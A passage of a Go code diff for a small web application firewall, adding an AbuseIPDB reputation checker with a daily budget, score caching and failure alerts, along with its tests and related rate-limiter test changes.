limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
for _, i := range []int{2, 3, 0, 1} { for _, i := range []int{2, 3, 0, 1} {
limiter.Count(netip.MustParsePrefix(want[i]), midnight()) limiter.Count(netip.MustParsePrefix(want[i]), midnight(), whole)
} }
snapshot := limiter.Snapshot() snapshot := limiter.Snapshot()
@@ -43,7 +43,7 @@ func TestLoadedCountsCarryOn(t *testing.T) {
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
before := ratelimit.New(ratelimit.Limits{PerHour: limit}) before := ratelimit.New(ratelimit.Limits{PerHour: limit}, tableSize)
for range limit { for range limit {
wantCount(t, before, client, start, "") wantCount(t, before, client, start, "")
} }
@@ -51,7 +51,7 @@ func TestLoadedCountsCarryOn(t *testing.T) {
// Loaded into a new limiter, as across a restart, the client has no // Loaded into a new limiter, as across a restart, the client has no
// fresh allowance. // fresh allowance.
later := start.Add(time.Minute) later := start.Add(time.Minute)
after := ratelimit.New(ratelimit.Limits{PerHour: limit}) after := ratelimit.New(ratelimit.Limits{PerHour: limit}, tableSize)
after.Load(before.Snapshot(), later) after.Load(before.Snapshot(), later)
wantCount(t, after, client, later, hour) wantCount(t, after, client, later, hour)
} }
@@ -62,40 +62,54 @@ func TestLoadEmptiesBucketsWhoseTimeHasPassed(t *testing.T) {
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
start := midnight() start := midnight()
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, tableSize)
limiter.Count(client, start) limiter.Count(client, start, whole)
limiter.CountBytes(client, start, 5, whole)
limiter.CountRefusal(client, start, limit)
limiter.AddToHistory(client, start, ratelimit.Request{Forwarded: true}) limiter.AddToHistory(client, start, ratelimit.Request{Forwarded: true})
loaded := func(now time.Time) ratelimit.Client { loaded := func(now time.Time) ratelimit.Client {
t.Helper() t.Helper()
after := ratelimit.New(ratelimit.Limits{}) after := ratelimit.New(ratelimit.Limits{}, tableSize)
after.Load(limiter.Snapshot(), now) after.Load(limiter.Snapshot(), now)
return after.Snapshot()[0] return after.Snapshot()[0]
} }
// Two minutes on, the window that ends then covers neither of the // Two minutes on, the window that ends then covers none of the
// minute's buckets, which are emptied; the hour's and the day's stay, // minute's buckets, of requests, of bytes and of refusals, which are
// and so does the history. // emptied; the hour's and the day's stay, and so does the history.
got := loaded(start.Add(2 * time.Minute)) got := loaded(start.Add(2 * time.Minute))
if got.Minute != (ratelimit.Buckets{}) || got.Hour.Current != 1 || if got.Minute != (ratelimit.Buckets{}) || got.Hour.Current != 1 ||
got.Day.Current != 1 || got.History.Requests != 1 { got.Day.Current != 1 || got.History.Requests != 1 {
t.Errorf("loaded two minutes on as %+v", got) t.Errorf("loaded two minutes on as %+v", got)
} }
if got.MinuteBytes != (ratelimit.Buckets{}) || got.HourBytes.Current != 5 ||
got.DayBytes.Current != 5 {
t.Errorf("loaded two minutes on with buckets of bytes %+v, %+v and %+v",
got.MinuteBytes, got.HourBytes, got.DayBytes)
}
if got.MinuteRefusals != (ratelimit.Buckets{}) {
t.Errorf("loaded two minutes on with buckets of refusals %+v",
got.MinuteRefusals)
}
// A moment before, the window still covers some of the earlier one. // A moment before, the window still covers some of the earlier one.
got = loaded(start.Add(2*time.Minute - time.Nanosecond)) got = loaded(start.Add(2*time.Minute - time.Nanosecond))
if got.Minute.Current != 1 { if got.Minute.Current != 1 || got.MinuteBytes.Current != 5 ||
t.Errorf("loaded just under two minutes on with minute buckets %+v", got.MinuteRefusals.Current != 1 {
got.Minute) t.Errorf("loaded just under two minutes on with minute buckets %+v, %+v "+
"and %+v", got.Minute, got.MinuteBytes, got.MinuteRefusals)
} }
} }
func TestLoadDropsTheLeastRecentlySeenFirst(t *testing.T) { func TestLoadDropsTheLeastRecentlySeenFirst(t *testing.T) {
t.Parallel() t.Parallel()
const maxClients = 20000 const maxClients = 3
// clients.json lists the clients by address. Here each was last seen // clients.json lists the clients by address. Here each was last seen
// a second before the one listed before it, so the last listed is the // a second before the one listed before it, so the last listed is the
@@ -109,7 +123,7 @@ func TestLoadDropsTheLeastRecentlySeenFirst(t *testing.T) {
addr = addr.Next() addr = addr.Next()
} }
limiter := ratelimit.New(ratelimit.Limits{}) limiter := ratelimit.New(ratelimit.Limits{}, maxClients)
limiter.Load(clients, midnight()) limiter.Load(clients, midnight())
got := limiter.Snapshot() got := limiter.Snapshot()
+328
View File
@@ -0,0 +1,328 @@
package reputation
import (
"context"
"encoding/json"
"errors"
"fmt"
"io"
"log/slog"
"net/http"
"net/netip"
"net/url"
"slices"
"sync"
"time"
"github.com/hashicorp/golang-lru/v2/simplelru"
"sneak.berlin/go/smallwebwaf/internal/alerts"
)
const (
// AbuseIPDBURL is where clients are checked: the check endpoint of
// AbuseIPDB's API.
AbuseIPDBURL = "https://api.abuseipdb.com/api/v2/check"
// AbuseIPDBSource is how the request log, the alerts and the metrics
// name AbuseIPDB.
AbuseIPDBSource = "abuseipdb"
// maxAnswerBytes is the most of an answer of AbuseIPDB that is read.
maxAnswerBytes = 64 << 10
// day is the length of the day the checks are counted in, in UTC.
day = 24 * time.Hour
)
var (
errNoScore = errors.New("the answer gives no abuseConfidenceScore")
errBudgetUsedUp = errors.New(
"checks spent; none is made until the day ends at 00:00 UTC")
)
// Score is what AbuseIPDB said about a client, as reputation.json holds
// it: the client, an IPv4 address or an IPv6 group, its abuse confidence
// score, from 0 to 100, and when AbuseIPDB answered.
type Score struct {
Client netip.Prefix `json:"client"`
Score int64 `json:"score"`
Fetched time.Time `json:"fetched"`
}
// Checks are what reputation.json keeps of the checks of clients with
// AbuseIPDB: the day, in UTC, of the checks Spent counts, zero before the
// first, and the scores still in use.
type Checks struct {
Day time.Time `json:"day,omitzero"`
Spent int `json:"spent"`
Scores []Score `json:"scores"`
}
// AbuseIPDBParams are what NewAbuseIPDB needs.
type AbuseIPDBParams struct {
// URL is where clients are checked, normally AbuseIPDBURL, with Key,
// the account's key (SWWAF_ABUSEIPDB_KEY).
URL string
Key string
// MinScore is the least score that is a hit (SWWAF_ABUSEIPDB_MIN_SCORE),
// and DailyBudget the most checks made in a day, in UTC
// (SWWAF_ABUSEIPDB_DAILY_BUDGET).
MinScore int64
DailyBudget int
// CacheTTL is how long a score is used after it was fetched
// (SWWAF_REPUTATION_CACHE_TTL), and Timeout how long a check may take
// (SWWAF_REPUTATION_TIMEOUT).
CacheTTL time.Duration
Timeout time.Duration
// Now tells the time, normally time.Now in UTC.
Now func() time.Time
// ProcessLog receives each check that fails, and why, and the day's
// budget used up.
ProcessLog *slog.Logger
// Alerts receive a source_failure alert for each.
Alerts *alerts.Queue
}
// AbuseIPDB checks clients with AbuseIPDB, in the background, and keeps
// their scores. It is safe for concurrent use.
type AbuseIPDB struct {
params AbuseIPDBParams
httpClient *http.Client
mu sync.Mutex
// scores are by client. Each is added as it is fetched and never moved
// up, so that the one fetched longest ago is the first dropped.
scores *simplelru.LRU[netip.Prefix, Score]
// checking are the clients whose check is under way.
checking map[netip.Prefix]bool
// day is the day, in UTC, of the checks spent counts.
day time.Time
spent int
// checks and failures count the checks made and those that failed,
// and retryAt is when a client may be checked again after the last
// check failed.
checks int
failures int
retryAt time.Time
}
// NewAbuseIPDB returns an AbuseIPDB with no score yet, and no check spent.
func NewAbuseIPDB(params AbuseIPDBParams) *AbuseIPDB {
scores, err := simplelru.NewLRU[netip.Prefix, Score](maxVerdicts, nil)
if err != nil {
panic(err) // NewLRU fails only for a size below one
}
return &AbuseIPDB{
params: params,
httpClient: &http.Client{},
scores: scores,
checking: map[netip.Prefix]bool{},
}
}
// Hit returns AbuseIPDB's score of client, an IPv4 address or an IPv6
// group, and whether it is a hit: MinScore or more. A score is used until
// CacheTTL has passed since it was fetched, whichever of the client's
// addresses its request comes from. A client without one is checked in
// the background, by addr, the address its request came from, if
// offender, if it has committed an offence, unless its check is under
// way, a check failed less than failureDelay ago, or the day's checks
// have used up DailyBudget; Hit never waits for a check. The check that
// uses the budget up is logged and raised as a source_failure alert. ctx
// is the context of the client's request, and a check goes on after the
// request ends.
func (a *AbuseIPDB) Hit(
ctx context.Context, client netip.Prefix, addr netip.Addr, offender bool,
) (int64, bool) {
a.mu.Lock()
now := a.params.Now()
kept, found := a.scores.Peek(client)
if found && now.Sub(kept.Fetched) < a.params.CacheTTL {
a.mu.Unlock()
return kept.Score, kept.Score >= a.params.MinScore
}
if today := now.Truncate(day); !a.day.Equal(today) {
a.day, a.spent = today, 0
}
check := offender && !a.checking[client] && !now.Before(a.retryAt) &&
a.spent < a.params.DailyBudget
if check {
a.checking[client] = true
a.checks++
a.spent++
go a.check(context.WithoutCancel(ctx), client, addr)
}
usedUp := check && a.spent == a.params.DailyBudget
a.mu.Unlock()
if usedUp {
a.alert("the daily budget of AbuseIPDB checks is used up",
fmt.Errorf("%d %w", a.params.DailyBudget, errBudgetUsedUp))
}
return 0, false
}
// Checked returns how many checks were made.
func (a *AbuseIPDB) Checked() int {
a.mu.Lock()
defer a.mu.Unlock()
return a.checks
}
// Failures returns how many checks failed.
func (a *AbuseIPDB) Failures() int {
a.mu.Lock()
defer a.mu.Unlock()
return a.failures
}
// BudgetLeft returns how many checks the day's budget has left.
func (a *AbuseIPDB) BudgetLeft() int {
a.mu.Lock()
defer a.mu.Unlock()
if !a.day.Equal(a.params.Now().Truncate(day)) {
return a.params.DailyBudget
}
return max(a.params.DailyBudget-a.spent, 0)
}
// Snapshot returns the checks spent and every score still in use, sorted
// by client, as reputation.json keeps them.
func (a *AbuseIPDB) Snapshot() Checks {
a.mu.Lock()
now := a.params.Now()
checks := Checks{Day: a.day, Spent: a.spent, Scores: make([]Score, 0, a.scores.Len())}
for _, kept := range a.scores.Values() {
if now.Sub(kept.Fetched) < a.params.CacheTTL {
checks.Scores = append(checks.Scores, kept)
}
}
a.mu.Unlock()
slices.SortFunc(checks.Scores, func(x, y Score) int {
return x.Client.Compare(y.Client)
})
return checks
}
// Load keeps checks, read from reputation.json, in place of those it
// keeps, but for the scores past maxVerdicts, those fetched longest ago.
// One fetched CacheTTL ago or more is neither used nor written, as for any
// score.
func (a *AbuseIPDB) Load(checks Checks) {
scores := slices.Clone(checks.Scores)
slices.SortStableFunc(scores, func(x, y Score) int {
return x.Fetched.Compare(y.Fetched)
})
a.mu.Lock()
defer a.mu.Unlock()
a.day, a.spent = checks.Day, checks.Spent
a.scores.Purge()
for _, kept := range scores {
a.scores.Add(kept.Client, kept)
}
}
// check checks client with AbuseIPDB by addr, one of its addresses, keeps
// the score as client's, and notes the check as no longer under way. A
// check that fails gives no score: it is counted, logged and raised as a
// source_failure alert, and no client is checked for failureDelay.
func (a *AbuseIPDB) check(ctx context.Context, client netip.Prefix, addr netip.Addr) {
score, err := a.ask(ctx, addr)
now := a.params.Now()
a.mu.Lock()
delete(a.checking, client)
if err == nil {
a.scores.Add(client, Score{Client: client, Score: score, Fetched: now})
} else {
a.failures++
a.retryAt = now.Add(failureDelay)
}
a.mu.Unlock()
if err != nil {
a.alert("checking a client with AbuseIPDB failed", err)
}
}
// ask asks AbuseIPDB for addr's abuse confidence score, sending the key
// in the header Key. An answer other than 200, one that gives no score,
// and none within Timeout, fail.
func (a *AbuseIPDB) ask(ctx context.Context, addr netip.Addr) (int64, error) {
ctx, cancel := context.WithTimeout(ctx, a.params.Timeout)
defer cancel()
query := url.Values{"ipAddress": {addr.String()}}
req, err := http.NewRequestWithContext(ctx, http.MethodGet,
a.params.URL+"?"+query.Encode(), http.NoBody)
if err != nil {
return 0, fmt.Errorf("make the request: %w", err)
}
req.Header.Set("Key", a.params.Key)
req.Header.Set("Accept", "application/json")
res, err := a.httpClient.Do(req)
if err != nil {
// Do's error names the URL, which holds the client's address, which
// is not to be logged: only what went wrong is kept.
return 0, fmt.Errorf("check the client: %w", errors.Unwrap(err))
}
defer func() {
_ = res.Body.Close()
}()
if res.StatusCode != http.StatusOK {
return 0, fmt.Errorf("%w %s", errStatus, res.Status)
}
var answer struct {
Data struct {
AbuseConfidenceScore *int64 `json:"abuseConfidenceScore"`
} `json:"data"`
}
err = json.NewDecoder(io.LimitReader(res.Body, maxAnswerBytes)).Decode(&answer)
if err != nil {
return 0, fmt.Errorf("read the answer: %w", err)
}
if answer.Data.AbuseConfidenceScore == nil {
return 0, errNoScore
}
return *answer.Data.AbuseConfidenceScore, nil
}
// alert raises a source_failure alert from AbuseIPDB with reason and err,
// and logs them.
func (a *AbuseIPDB) alert(reason string, err error) {
// Raised before it is logged, so that the alert is there once the log
// line is.
raiseFailure(a.params.Alerts, reason, AbuseIPDBSource, err)
a.params.ProcessLog.Warn(reason, "source", AbuseIPDBSource, "error", err.Error())
}
+663
View File
@@ -0,0 +1,663 @@
package reputation_test
import (
"bytes"
"encoding/json"
"fmt"
"io"
"log/slog"
"net/http"
"net/http/httptest"
"net/netip"
"reflect"
"slices"
"strings"
"sync"
"testing"
"testing/synctest"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/metrics"
"sneak.berlin/go/smallwebwaf/internal/reputation"
)
// The tests of AbuseIPDB run in synctest bubbles, as those of the lists
// do, and AbuseIPDB is a stand-in reached without the network, for the
// same reason. A bubble's clock starts at midnight UTC, as a day the
// checks are counted in starts.
const (
// key is the account's key the tests give, the only one the stand-in
// takes.
key = "abuseipdb-key-0123456789abcdef"
// suspect and other are clients that have committed an offence.
suspect = "203.0.113.9"
other = "2001:db8::9"
)
func TestOnlyAnOffenderWithoutAScoreIsChecked(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
abuseIPDB := &abuseIPDBStandIn{scores: map[string]int64{suspect: 100}}
checker := newAbuseIPDB(abuseIPDB, abuseIPDBParams())
// A client that has committed no offence is not checked.
wantScore(t, checker, suspect, false, 0, false)
synctest.Wait()
wantChecked(t, abuseIPDB)
// An offender is, and from then on its score is used, whether or not
// it is an offender.
wantScore(t, checker, suspect, true, 0, false)
synctest.Wait()
wantScore(t, checker, suspect, true, 100, true)
wantScore(t, checker, suspect, false, 100, true)
synctest.Wait()
wantChecked(t, abuseIPDB, suspect)
})
}
func TestIPv6ClientIsCheckedOnceAndItsScoreUsedForEachOfItsAddresses(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
// 15 addresses of 2001:db8:1:2::/64, one client, each in a part of
// it of its own.
var addresses []string
for i := 1; i < 16; i++ {
addresses = append(addresses, fmt.Sprintf("2001:db8:1:2:%x::9", i<<12))
}
abuseIPDB := &abuseIPDBStandIn{scores: map[string]int64{addresses[0]: 100}}
checker := newAbuseIPDB(abuseIPDB, abuseIPDBParams())
// A request from each has the client checked once, by the first.
for _, address := range addresses {
hitFrom(t, checker, address, true)
}
synctest.Wait()
wantChecked(t, abuseIPDB, addresses[0])
// Its score is the whole client's.
for _, address := range addresses {
wantScore(t, checker, address, true, 100, true)
}
synctest.Wait()
wantChecked(t, abuseIPDB, addresses[0])
})
}
func TestScoreAtOrOverTheMinimumIsAHit(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
scores := map[string]int64{"192.0.2.74": 74, "192.0.2.75": 75, "192.0.2.100": 100}
p := abuseIPDBParams()
p.MinScore = 75
checker := newAbuseIPDB(&abuseIPDBStandIn{scores: scores}, p)
for client := range scores {
hitFrom(t, checker, client, true)
}
synctest.Wait()
for client, score := range scores {
wantScore(t, checker, client, true, score, score >= 75)
}
})
}
func TestScoreUsedUntilTheCacheTTLHasPassedSinceItWasFetched(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
abuseIPDB := &abuseIPDBStandIn{scores: map[string]int64{suspect: 100}}
checker := newAbuseIPDB(abuseIPDB, abuseIPDBParams())
hitFrom(t, checker, suspect, true)
synctest.Wait()
// AbuseIPDB gives another score from now on, but the one kept is
// used, and the client is not checked again, until the TTL has
// passed.
abuseIPDB.setScore(suspect, 80)
time.Sleep(cacheTTL - time.Nanosecond)
wantScore(t, checker, suspect, true, 100, true)
synctest.Wait()
wantChecked(t, abuseIPDB, suspect)
// Then it is not used, and the client is checked again.
time.Sleep(time.Nanosecond)
wantScore(t, checker, suspect, true, 0, false)
synctest.Wait()
wantScore(t, checker, suspect, true, 80, true)
wantChecked(t, abuseIPDB, suspect, suspect)
})
}
func TestDailyBudgetKeptAcrossARestartAndWholeAgainAsTheDayEnds(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
queue := newQueue()
p := abuseIPDBParams()
p.DailyBudget = 3
p.Alerts = queue
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
abuseIPDB := &abuseIPDBStandIn{scores: map[string]int64{suspect: 100}}
checker := newAbuseIPDB(abuseIPDB, p)
// At noon, the first three offenders spend the budget, and the
// fourth, unchecked, is not.
time.Sleep(12 * time.Hour)
const unchecked = "192.0.2.4"
clients := []string{suspect, "192.0.2.2", "192.0.2.3", unchecked}
for _, client := range clients {
hitFrom(t, checker, client, true)
}
synctest.Wait()
wantChecked(t, abuseIPDB, clients[:3]...)
wantBudgetLeft(t, checker, 0)
// The check that used the budget up raised the alert, and logged it.
const usedUp = "the daily budget of AbuseIPDB checks is used up"
wantFailureAlert(t, queue, time.Now(), usedUp,
"3 checks spent; none is made until the day ends at 00:00 UTC", 0)
if !strings.Contains(log.String(), `"msg":"`+usedUp+`"`) {
t.Errorf("logged\n%s\nwant the budget used up", log.String())
}
// Restarted with what reputation.json keeps, it uses the scores, and
// checks no client until the day ends.
restarted := &abuseIPDBStandIn{}
again := newAbuseIPDB(restarted, p)
again.Load(checker.Snapshot())
wantScore(t, again, suspect, true, 100, true)
wantBudgetLeft(t, again, 0)
time.Sleep(12*time.Hour - time.Nanosecond)
wantScore(t, again, unchecked, true, 0, false)
synctest.Wait()
wantChecked(t, restarted)
// At midnight the budget is whole again.
time.Sleep(time.Nanosecond)
wantBudgetLeft(t, again, 3)
wantScore(t, again, unchecked, true, 0, false)
synctest.Wait()
wantChecked(t, restarted, unchecked)
wantBudgetLeft(t, again, 2)
})
}
func TestFailedCheckGivesNoScoreAndNoClientIsCheckedForAMinute(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
// key is the key sent, status and body what AbuseIPDB answers with,
// and error the failure.
key, body string
status int
error string
}{
{
"a refusal, past AbuseIPDB's own limit", key,
`{"errors":[{"detail":"Daily rate limit of 1000 requests exceeded"}]}`,
http.StatusTooManyRequests, "the server answered 429 Too Many Requests",
},
{
"a refusal of a wrong key", "wrong-key-0123456789abcdef", "", 0,
"the server answered 401 Unauthorized",
},
{
"a server failure", key, "", http.StatusInternalServerError,
"the server answered 500 Internal Server Error",
},
{
"an answer without a score", key, `{"data":{"ipAddress":"` + suspect + `"}}`,
http.StatusOK, "the answer gives no abuseConfidenceScore",
},
{
"an answer that is not JSON", key, "<html>", http.StatusOK,
"read the answer: invalid character '<' looking for beginning of value",
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
queue := newQueue()
p := abuseIPDBParams()
p.Key = tc.key
p.Alerts = queue
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
abuseIPDB := &abuseIPDBStandIn{status: tc.status, body: tc.body}
checker := newAbuseIPDB(abuseIPDB, p)
// The failure gives no score, and no client is checked within a
// minute of it.
wantScore(t, checker, suspect, true, 0, false)
synctest.Wait()
time.Sleep(time.Minute - time.Nanosecond)
wantScore(t, checker, other, true, 0, false)
synctest.Wait()
wantChecked(t, abuseIPDB, suspect)
wantFailures(t, checker, 1)
time.Sleep(time.Nanosecond)
wantScore(t, checker, other, true, 0, false)
synctest.Wait()
wantChecked(t, abuseIPDB, suspect, other)
wantFailures(t, checker, 2)
if scores := checker.Snapshot().Scores; len(scores) != 0 {
t.Errorf("scores %+v, want none", scores)
}
// One alert for the first failure; the cooldown holds back the
// second.
wantFailureAlert(t, queue, time.Now().Add(-time.Minute),
"checking a client with AbuseIPDB failed", tc.error, 1)
if !strings.Contains(log.String(), `"msg":"checking a client with `+
`AbuseIPDB failed","source":"abuseipdb","error":"`+tc.error) {
t.Errorf("logged\n%s\nwant the failures", log.String())
}
})
})
}
}
func TestCheckNotAnsweredWithinTheTimeoutFailsAndHitNeverWaits(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
queue := newQueue()
p := abuseIPDBParams()
p.Alerts = queue
abuseIPDB := &abuseIPDBStandIn{hanging: true}
checker := newAbuseIPDB(abuseIPDB, p)
began := time.Now()
// The second, while the first's check is under way, starts none.
wantScore(t, checker, suspect, true, 0, false)
wantScore(t, checker, suspect, true, 0, false)
if waited := time.Since(began); waited != 0 {
t.Errorf("waited %s for the check, want no wait", waited)
}
time.Sleep(timeout - time.Nanosecond)
synctest.Wait()
wantChecked(t, abuseIPDB, suspect)
wantFailures(t, checker, 0)
time.Sleep(time.Nanosecond)
synctest.Wait()
wantFailures(t, checker, 1)
wantFailureAlert(t, queue, time.Now(), "checking a client with AbuseIPDB failed",
"check the client: context deadline exceeded", 0)
})
}
func TestKeyIsSentInTheKeyHeaderAndNeverShown(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
queue := newQueue()
p := abuseIPDBParams()
p.Alerts = queue
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
abuseIPDB := &abuseIPDBStandIn{scores: map[string]int64{suspect: 100}}
checker := newAbuseIPDB(abuseIPDB, p)
m := metrics.New(1, "app")
m.AddReputation(reputation.New(params()), reputation.NewDNSBL(dnsblParams()))
m.AddAbuseIPDB(checker)
// One check that AbuseIPDB answers, and one it refuses with an answer
// that names the key.
wantScore(t, checker, suspect, true, 0, false)
synctest.Wait()
wantScore(t, checker, suspect, true, 100, true)
abuseIPDB.answerWith(http.StatusUnauthorized, `{"errors":[{"detail":"`+key+`"}]}`)
wantScore(t, checker, other, true, 0, false)
synctest.Wait()
wantFailures(t, checker, 1)
abuseIPDB.mu.Lock()
sent := slices.Clone(abuseIPDB.keys)
abuseIPDB.mu.Unlock()
if !slices.Equal(sent, []string{key, key}) {
t.Errorf("checks sent the keys %v, want %s twice", sent, key)
}
alerted, err := json.Marshal(waiting(queue))
if err != nil {
t.Fatalf("encode the alerts: %v", err)
}
kept, err := json.Marshal(checker.Snapshot())
if err != nil {
t.Fatalf("encode the checks: %v", err)
}
for name, shown := range map[string]string{
"the log": log.String(), "the alerts": string(alerted),
"the metrics": scrapeMetrics(t, m), "reputation.json": string(kept),
} {
if strings.Contains(shown, key) {
t.Errorf("%s shows the key:\n%s", name, shown)
}
}
})
}
func TestMetricsCountTheChecksTheFailuresAndTheBudgetLeft(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
abuseIPDB := &abuseIPDBStandIn{}
p := abuseIPDBParams()
p.DailyBudget = 5
checker := newAbuseIPDB(abuseIPDB, p)
m := metrics.New(1, "app")
m.AddReputation(reputation.New(params()), reputation.NewDNSBL(dnsblParams()))
m.AddAbuseIPDB(checker)
// One check that AbuseIPDB answers, and one that fails.
hitFrom(t, checker, suspect, true)
synctest.Wait()
abuseIPDB.answerWith(http.StatusInternalServerError, "")
hitFrom(t, checker, other, true)
synctest.Wait()
scraped := scrapeMetrics(t, m)
for series, want := range map[string]string{
"queries_total": "2",
"failures_total": "1",
"daily_budget_remaining": "3",
} {
line := "\nsmallwebwaf_reputation_" + series +
`{instance="app",source="abuseipdb"} ` + want + "\n"
if !strings.Contains(scraped, line) {
t.Errorf("metrics\n%s\nwant%s", scraped, line)
}
}
})
}
func TestScoreFetchedATTLAgoIsNeitherUsedNorKept(t *testing.T) {
t.Parallel()
now := time.Date(2026, 10, 7, 0, 0, 0, 0, time.UTC)
p := abuseIPDBParams()
p.Now = func() time.Time { return now }
checker := reputation.NewAbuseIPDB(p)
// The last score still in use, and one, of other's /64, fetched a TTL
// ago.
inUse := reputation.Score{
Client: netip.MustParsePrefix(suspect + "/32"), Score: 100,
Fetched: now.Add(-cacheTTL + time.Nanosecond),
}
stale := reputation.Score{
Client: netip.MustParsePrefix("2001:db8::/64"), Score: 100,
Fetched: now.Add(-cacheTTL),
}
checker.Load(reputation.Checks{Scores: []reputation.Score{stale, inUse}})
wantScore(t, checker, suspect, false, 100, true)
wantScore(t, checker, other, false, 0, false)
got := checker.Snapshot().Scores
if !reflect.DeepEqual(got, []reputation.Score{inUse}) {
t.Errorf("scores %+v, want only %+v", got, inUse)
}
}
func TestAtMost100000ScoresKeptTheOneFetchedLongestAgoDroppedFirst(t *testing.T) {
t.Parallel()
now := time.Date(2026, 10, 7, 0, 0, 0, 0, time.UTC)
p := abuseIPDBParams()
p.Now = func() time.Time { return now }
checker := reputation.NewAbuseIPDB(p)
// 100,001 scores, listed by client, as reputation.json lists them, each
// fetched a millisecond before the one before it: the last is one too
// many.
const count = 100001
scores := make([]reputation.Score, 0, count)
addr := netip.MustParseAddr("198.18.0.0")
for i := range count {
scores = append(scores, reputation.Score{
Client: netip.PrefixFrom(addr, 32),
Fetched: now.Add(-time.Duration(i) * time.Millisecond),
})
addr = addr.Next()
}
checker.Load(reputation.Checks{Scores: scores})
got := checker.Snapshot().Scores
if len(got) != count-1 || !slices.Contains(got, scores[0]) ||
slices.Contains(got, scores[count-1]) {
t.Errorf("%d scores kept, want all but the one fetched longest ago", len(got))
}
}
// abuseIPDBStandIn is a stand-in for AbuseIPDB. It answers a check sent
// with key by the client's score, as scores gives it, 0 for a client it
// does not give; a check sent with another key with 401; and, while
// status is not 0, every check with status and body; and while hanging,
// none at all. It notes each client checked, and the key sent.
type abuseIPDBStandIn struct {
mu sync.Mutex
scores map[string]int64
status int
body string
hanging bool
checked []string
keys []string
}
// RoundTrip has the stand-in answer req, in place of the network. A check
// abandoned before the stand-in answers fails, as over the network.
func (s *abuseIPDBStandIn) RoundTrip(req *http.Request) (*http.Response, error) {
client := req.URL.Query().Get("ipAddress")
sent := req.Header.Get("Key")
s.mu.Lock()
s.checked = append(s.checked, client)
s.keys = append(s.keys, sent)
score := s.scores[client]
status, body, hanging := s.status, s.body, s.hanging
s.mu.Unlock()
switch {
case hanging:
<-req.Context().Done()
return nil, req.Context().Err()
case sent != key:
status = http.StatusUnauthorized
case status == 0:
status = http.StatusOK
body = fmt.Sprintf(`{"data":{"ipAddress":%q,"abuseConfidenceScore":%d}}`, client,
score)
}
return &http.Response{
StatusCode: status,
Status: fmt.Sprintf("%d %s", status, http.StatusText(status)),
Header: http.Header{},
Body: io.NopCloser(strings.NewReader(body)),
Request: req,
}, nil
}
// setScore has the stand-in give client score.
func (s *abuseIPDBStandIn) setScore(client string, score int64) {
s.mu.Lock()
defer s.mu.Unlock()
s.scores[client] = score
}
// answerWith has the stand-in answer every check with status and body.
func (s *abuseIPDBStandIn) answerWith(status int, body string) {
s.mu.Lock()
defer s.mu.Unlock()
s.status, s.body = status, body
}
// abuseIPDBParams returns the AbuseIPDBParams of the tests: key, a minimum
// score of 75, a daily budget of 900, and the cache TTL and timeout of the
// DNSBL tests, by the bubble's clock, with alerts to a queue that sends
// none.
func abuseIPDBParams() reputation.AbuseIPDBParams {
return reputation.AbuseIPDBParams{
URL: "https://abuseipdb.example/api/v2/check",
Key: key,
MinScore: 75,
DailyBudget: 900,
CacheTTL: cacheTTL,
Timeout: timeout,
Now: time.Now,
ProcessLog: slog.New(slog.DiscardHandler),
Alerts: newQueue(),
}
}
// newAbuseIPDB returns the AbuseIPDB of p, checking clients with
// abuseIPDB.
func newAbuseIPDB(
abuseIPDB *abuseIPDBStandIn, p reputation.AbuseIPDBParams,
) *reputation.AbuseIPDB {
checker := reputation.NewAbuseIPDB(p)
checker.SetTransport(abuseIPDB)
return checker
}
// wantScore checks the score checker gives client, and whether it is a
// hit, as a request from client finds them, offender or not.
func wantScore(
t *testing.T, checker *reputation.AbuseIPDB, client string, offender bool,
score int64, hit bool,
) {
t.Helper()
gotScore, gotHit := hitFrom(t, checker, client, offender)
if gotScore != score || gotHit != hit {
t.Errorf("%s has the score %d, a hit %t, want %d, %t", client, gotScore, gotHit,
score, hit)
}
}
// hitFrom is checker's Hit for a request from address, offender or not.
// Its client is address for an IPv4 address, and its /64 for an IPv6 one,
// as smallwebwaf counts clients.
func hitFrom(
t *testing.T, checker *reputation.AbuseIPDB, address string, offender bool,
) (int64, bool) {
t.Helper()
addr := netip.MustParseAddr(address)
client := netip.PrefixFrom(addr, addr.BitLen())
if addr.Is6() {
client = netip.PrefixFrom(addr, 64).Masked()
}
return checker.Hit(t.Context(), client, addr, offender)
}
// wantChecked checks the clients the stand-in was asked about, in any
// order.
func wantChecked(t *testing.T, abuseIPDB *abuseIPDBStandIn, want ...string) {
t.Helper()
abuseIPDB.mu.Lock()
got := slices.Sorted(slices.Values(abuseIPDB.checked))
abuseIPDB.mu.Unlock()
want = slices.Sorted(slices.Values(want))
if !slices.Equal(got, want) {
t.Errorf("checked %v, want %v", got, want)
}
}
// wantFailures checks how many checks failed.
func wantFailures(t *testing.T, checker *reputation.AbuseIPDB, want int) {
t.Helper()
if got := checker.Failures(); got != want {
t.Errorf("%d checks failed, want %d", got, want)
}
}
// wantFailureAlert checks that the one alert waiting in queue is a
// source_failure alert from AbuseIPDB, raised at raised, with reason and
// the error failure, and that the cooldown has held back held repeats of
// it.
func wantFailureAlert(
t *testing.T, queue *alerts.Queue, raised time.Time, reason, failure string,
held int64,
) {
t.Helper()
got := waiting(queue)
if len(got) != 1 || !got[0].Time.Equal(raised) ||
got[0].Event != alerts.EventSourceFailure || got[0].Reason != reason ||
